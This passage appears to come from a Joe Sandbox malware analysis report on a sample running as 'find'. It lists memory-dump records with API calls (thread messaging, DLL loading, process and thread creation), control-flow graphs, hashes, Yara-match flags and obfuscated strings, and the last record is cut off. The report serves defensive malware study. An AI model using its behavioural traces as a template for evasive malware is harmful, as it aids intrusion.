                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 89a5f4db994ca1cec0115f634ab9570acf739433f089fb2e71b288e2a80f9efc
                                                                                                                                        • Instruction ID: 57a66ea8510369f6db8851abfd0e1250135c8258215a9f724b38c2e77c1e8c9e
                                                                                                                                        • Opcode Fuzzy Hash: 89a5f4db994ca1cec0115f634ab9570acf739433f089fb2e71b288e2a80f9efc
                                                                                                                                        • Instruction Fuzzy Hash: 7A900435315C0CC30105F55C07045070047C7DD351355D031F10175D4CD771CD715131
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 4bfe012619980bf960f984a4cf7f99ae06ef69646ea3a431e46d9ff8eb8a6c9d
                                                                                                                                        • Instruction ID: a39fdc2bd7b9378142ef5ab98e11a09d9599d5359d8ed9af3e63aaa4610206da
                                                                                                                                        • Opcode Fuzzy Hash: 4bfe012619980bf960f984a4cf7f99ae06ef69646ea3a431e46d9ff8eb8a6c9d
                                                                                                                                        • Instruction Fuzzy Hash: CE900235225808830145F558070450B044597DA351395D015F14175D4CC76189655321
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 7eb1dfee09a148bf0154efff85cbdbaca958e90881ac0fe23b40a4b5d0d88878
                                                                                                                                        • Instruction ID: f7d764c1f583963d6b075d0962e363bba60367b7039a0305e0f6f4312ecd4d43
                                                                                                                                        • Opcode Fuzzy Hash: 7eb1dfee09a148bf0154efff85cbdbaca958e90881ac0fe23b40a4b5d0d88878
                                                                                                                                        • Instruction Fuzzy Hash: 7090027134580CC3D100B1584514B060005C7E5301F55D015E1066598D8759CD526126
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: c8ff8882798fc64709758aadcebcbc386113b488e33feaa685aa4d4258cfa1d8
                                                                                                                                        • Instruction ID: ea9f7feb2378a219d3958a1f044e39042995b8ae099d985bae4ec818739a8cb7
                                                                                                                                        • Opcode Fuzzy Hash: c8ff8882798fc64709758aadcebcbc386113b488e33feaa685aa4d4258cfa1d8
                                                                                                                                        • Instruction Fuzzy Hash: BD900231605808C34140B16889449064005ABE5211755D121A099A594D879989655665
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 52f1cac4207b021f94e553ca99aef1effe8bb20007bc9b3834a807124e6dc402
                                                                                                                                        • Instruction ID: 71d3579843e5fb7f5bf40c93a964a10dbaa18651d6888ed1f0213ef759b54abc
                                                                                                                                        • Opcode Fuzzy Hash: 52f1cac4207b021f94e553ca99aef1effe8bb20007bc9b3834a807124e6dc402
                                                                                                                                        • Instruction Fuzzy Hash: CF900231215C08C3D200B5684D14B07000587D4303F55D115A0156598CCB5589615521
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 1d76bc04714d51660e62fc7cfba3c3bec5f5dd6770ab9cd8de96447bb52664cb
                                                                                                                                        • Instruction ID: 3afcfa6652d1bdf157efa8416c0b426e8e16987d458c8dfc8dbbaadad0b2ba96
                                                                                                                                        • Opcode Fuzzy Hash: 1d76bc04714d51660e62fc7cfba3c3bec5f5dd6770ab9cd8de96447bb52664cb
                                                                                                                                        • Instruction Fuzzy Hash: 6F90023160580D83D101B1584504616000A87D4241F95D022A1026599ECB658A92A131
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 051b57e4f4cbfb49eaeae3b6ec572f7f215f61fc8e1a0acb1672a1c0903144bc
                                                                                                                                        • Instruction ID: ce29756c9d1f4ec346296fb9032911be6428ce2a640da2d580c93cf96e88fb8e
                                                                                                                                        • Opcode Fuzzy Hash: 051b57e4f4cbfb49eaeae3b6ec572f7f215f61fc8e1a0acb1672a1c0903144bc
                                                                                                                                        • Instruction Fuzzy Hash: 1D900271205C0C83D140B5584904607000587D4302F55D011A2066599E8B698D516135

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 425 8b0ef7-8b0f09 426 8b0f4b-8b0f54 425->426 427 8b0f0b-8b0f1d 425->427 428 8b0f1f-8b0f26 427->428 429 8b0f76-8b0f7f 427->429 432 8b0f27-8b0f43 428->432 430 8b0f85-8b0fca call 8b4730 call 8a13e0 call 8c1e60 429->430 431 8b0f80 call 8cc1a0 429->431 440 8b0fea-8b0ff0 430->440 441 8b0fcc-8b0fdb PostThreadMessageW 430->441 431->430 432->426 441->440 442 8b0fdd-8b0fe7 441->442 442->440
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 008B0FD7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 443 8b0f5d-8b0fca call 8cb790 call 8cc1a0 call 8b4730 call 8a13e0 call 8c1e60 456 8b0fea-8b0ff0 443->456 457 8b0fcc-8b0fdb PostThreadMessageW 443->457 457->456 458 8b0fdd-8b0fe7 457->458 458->456
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 008B0FD7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 459 8b0f60-8b0fca call 8cb790 call 8cc1a0 call 8b4730 call 8a13e0 call 8c1e60 471 8b0fea-8b0ff0 459->471 472 8b0fcc-8b0fdb PostThreadMessageW 459->472 472->471 473 8b0fdd-8b0fe7 472->473 473->471
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 008B0FD7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 474 8b0ee4-8b0fca call 8cb790 call 8cc1a0 call 8b4730 call 8a13e0 call 8c1e60 486 8b0fea-8b0ff0 474->486 487 8b0fcc-8b0fdb PostThreadMessageW 474->487 487->486 488 8b0fdd-8b0fe7 487->488 488->486
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 008B0FD7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 008C3D7B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                                        • String ID: @J7<
                                                                                                                                        APIs
                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 008B47A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,008B84FE,00000010,?,?,?,00000044,?,00000010,008B84FE,?,?,?), ref: 008C9A90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 008A9E55
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 008A9E55
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,558D0001,00000007,00000000,00000004,00000000,008B3F93,000000F4), ref: 008C99DC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(008B1BF9,?,008C6183,008B1BF9,008C589F,008C6183,?,008B1BF9,008C589F,00001000,?,?,00000000), ref: 008C9999
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction ID: dc09c2b0d5d4b1eb584b48307eb59922abd6e88760f7dbde98ba548449f1e4c4
                                                                                                                                        • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction Fuzzy Hash: 5FE06576200208BBDA14EE58DC42FAB37ACEFC9754F008018F908E7242C670BC108ABA
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 008B856C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 2018039860a9adb35563105fde544d1fbe1ea6a95555c4e7d685595568e2857d
                                                                                                                                        • Instruction ID: 4eae6756c9be7f298afff75529aa189cfb6a28ee10bbdc70bb186ae075966434
                                                                                                                                        • Opcode Fuzzy Hash: 2018039860a9adb35563105fde544d1fbe1ea6a95555c4e7d685595568e2857d
                                                                                                                                        • Instruction Fuzzy Hash: 3AE0DF7560030867EA306AAC9C46FA2335CFB48B64F188660B85DCB2D2E938F941C291
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,008B1F00,008C81DF,008C589F,008B1EC6), ref: 008B8363
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: f0cc406917c0cbb273357772776b46c32e5c538d7d09d287f40eaa79920eb81d
                                                                                                                                        • Instruction ID: 6983f959a3387771cd18b1f848a45cd2cd2db5ed767ee625beb2a2b85e5323af
                                                                                                                                        • Opcode Fuzzy Hash: f0cc406917c0cbb273357772776b46c32e5c538d7d09d287f40eaa79920eb81d
                                                                                                                                        • Instruction Fuzzy Hash: 46E08CB26402047BEA00AAB49C47FA522C8E744B94F184074BD0CD6382FC64E50182A1
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,008B1F00,008C81DF,008C589F,008B1EC6), ref: 008B8363
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 286ba91103c92feaf7c336ad5aabada764f6f5e8fd78604007f9a057e5668fcb
                                                                                                                                        • Instruction ID: c1435f7d4bd87d9a3a8f26bfc5040880df80d63b605648391e61f9133543fbfb
                                                                                                                                        • Opcode Fuzzy Hash: 286ba91103c92feaf7c336ad5aabada764f6f5e8fd78604007f9a057e5668fcb
                                                                                                                                        • Instruction Fuzzy Hash: 49D05E716443087BFA00A6E8CC4BF5632CCBB44B95F144074BA4CD63C2FD64F50086A6
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 0e01b22f69a105dd69232e72531d8f1c59a9e14ac90008f20d766f67a683f015
                                                                                                                                        • Instruction ID: 78e035d8caccd0c8f413caa480fd89b3dc111e9f62022f118db0be132f2d60e0
                                                                                                                                        • Opcode Fuzzy Hash: 0e01b22f69a105dd69232e72531d8f1c59a9e14ac90008f20d766f67a683f015
                                                                                                                                        • Instruction Fuzzy Hash: C9B09B719069C9CADA51E76047087177944A7D0701F19C461D30316C5F4779C1D1E1B5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127540782.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_2fa0000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 516cf0092a273cd676debb2814757595a844c6a2a0e1e148994c73f51f6bee84
                                                                                                                                        • Instruction ID: 3aeb88098ac5cb29db1ecb8b1c68c1720706bbfbbf375a5a03e5d01dd7128be9
                                                                                                                                        • Opcode Fuzzy Hash: 516cf0092a273cd676debb2814757595a844c6a2a0e1e148994c73f51f6bee84
                                                                                                                                        • Instruction Fuzzy Hash: 3041D5B1A18B0D4FD368EF69A491776B3E2FB49340F50053DDA8AC3352EB74E8468785
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127540782.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_2fa0000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                        • API String ID: 0-3558027158
                                                                                                                                        • Opcode ID: e0d76da973dc9e9afa2a2757dc803c9f43d442ce4fccf21f6a86c7a9a92e3bfc
                                                                                                                                        • Instruction ID: 76ac4abed3cd9c1636e78bff7380abdf9bf3379ba1499223db1270d6310fc381
                                                                                                                                        • Opcode Fuzzy Hash: e0d76da973dc9e9afa2a2757dc803c9f43d442ce4fccf21f6a86c7a9a92e3bfc
                                                                                                                                        • Instruction Fuzzy Hash: 88915FF04482988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058F85
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127540782.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_2fa0000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (/2,$)/+2$)2,<$*(5<$*2.'$+2-$$+2/*$-$<O$-),$$-)5$.,-*$/)+2$/*<4$0<pu$2,2.$2./)$4Kur$<4/2$<KSK$<RH<$<^uh$O}zy$P0<p$Qsfu$WTHQ$Wuh3$]llp$l}e3$pp}3$rxyn$s5<_$tnsq$tnsq$u3)/$uwy<$wy<_$xsko$xyzy$y3(/$y<.,$yKy~$}z}n
                                                                                                                                        • API String ID: 0-606234297
                                                                                                                                        • Opcode ID: 6df663d635a1a1722d89c8c0425043685b6303dc4a697d6caa717b5cfa18fba6
                                                                                                                                        • Instruction ID: e45c99f36ce07d97f1e93eb29b4232a8a1bf0574ca89ae2582ccb572583d777a
                                                                                                                                        • Opcode Fuzzy Hash: 6df663d635a1a1722d89c8c0425043685b6303dc4a697d6caa717b5cfa18fba6
                                                                                                                                        • Instruction Fuzzy Hash: 28413EB084434CEBCF158F85E980ADEBB71FF01380F905219E9486F368CB758A56CB89
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: 48c6106448f63dcb5013cb63f182d978e272a35d39377010f71b400b7536232e
                                                                                                                                        • Instruction ID: c2e56c690a7c1cc118d366f5d30bc9c326d1fcd6e6af27cb9b4ce2e0e37d5868
                                                                                                                                        • Opcode Fuzzy Hash: 48c6106448f63dcb5013cb63f182d978e272a35d39377010f71b400b7536232e
                                                                                                                                        • Instruction Fuzzy Hash: 025107B9A05256BFCB20DB98C88097FFBFCBF4C2007148569E5A5D7A41D774DE508BA0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: 4a79bf933a9f00a0f78b974de8d52b3e5ea091ae8a212c4e6436ca354d7ecd4b
